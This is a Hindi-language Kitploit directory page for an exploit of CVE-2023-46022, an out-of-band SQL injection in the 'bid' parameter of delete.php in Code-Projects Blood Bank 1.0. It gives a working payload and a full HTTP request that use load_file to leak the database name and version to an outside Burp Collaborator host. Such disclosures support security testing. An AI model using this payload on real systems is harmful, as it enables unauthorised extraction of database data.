Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability | Kitploit
उपकरण/GitHubGitHub/ersinerenler/cve-2023-46022-code-projects-blood-bank-1.0-oob-sql-injection-vulnerability
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubersinerenler/cve-2023-46022-code-projects-blood-bank-1.0-oob-sql-injection-vulnerability

CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
1 साल पहलेअभी तक समीक्षित नहीं

CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability

  • एक्सप्लॉइट लेखक: ersinerenler

विक्रेता होमपेज

  • https://code-projects.org/blood-bank-in-php-with-source-code

सॉफ्टवेयर लिंक

  • https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip

अवलोकन

  • Code-Projects Blood Bank V1.0, /delete.php फ़ाइल में 'bid' पैरामीटर के माध्यम से आउट-ऑफ-बैंड (OOB) SQL इंजेक्शन से संबंधित एक गंभीर सुरक्षा भेद्यता के संपर्क में है। यह भेद्यता उचित सुरक्षा तंत्र की कमी के कारण उत्पन्न होती है, जिससे हमलावर पैरामीटर का दुरुपयोग कर सकते हैं और Burp Collaborator के माध्यम से OOB SQL इंजेक्शन हमले कर सकते हैं। इसके परिणामस्वरूप अनधिकृत पहुंच और डेटाबेस से संवेदनशील जानकारी का निष्कर्षण हो सकता है।

भेद्यता विवरण

  • CVE आईडी: CVE-2023-46022
  • प्रभावित संस्करण: Blood Bank V1.0
  • भेद्य फ़ाइल: /delete.php
  • पैरामीटर नाम: bid
  • हमले का प्रकार: स्थानीय

संदर्भ:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46022
  • https://nvd.nist.gov/vuln/detail/CVE-2023-46022

विवरण

  • Code-Projects Blood Bank V1.0 के /delete.php फ़ाइल में 'bid' पैरामीटर आउट-ऑफ-बैंड (OOB) SQL इंजेक्शन के प्रति संवेदनशील है। यह भेद्यता अपर्याप्त सुरक्षा तंत्र के कारण उत्पन्न होती है, जिससे हमलावर OOB SQL इंजेक्शन हमले शुरू करने के लिए Burp Collaborator का उपयोग करके पैरामीटर का शोषण कर सकते हैं। इस तकनीक के माध्यम से, एक हमलावर डेटाबेस से संवेदनशील जानकारी निकाल सकता है।

प्रूफ ऑफ कॉन्सेप्ट (PoC) :

  • Burp Suite के माध्यम से delete.php के अनुरोध को इंटरसेप्ट करें
  • पेलोड को भेद्य पैरामीटर में इंजेक्ट करें
  • पेलोड: 3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.collaborator-domain\\a.txt')))%2b'
  • bid पैरामीटर के लिए उदाहरण अनुरोध
root@kitploit:~
---
GET /bloodbank/file/delete.php?bid=3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.cuaxacpnxbay7ss8o3csf4bkwb22qtei.oastify.com\\a.txt')))%2b' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://localhost/bloodbank/bloodinfo.php
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
---
  • डेटाबेस और संस्करण की जानकारी Burp Suite Collaborator के माध्यम से प्राप्त की गई
छवि
टूल डाउनलोड करें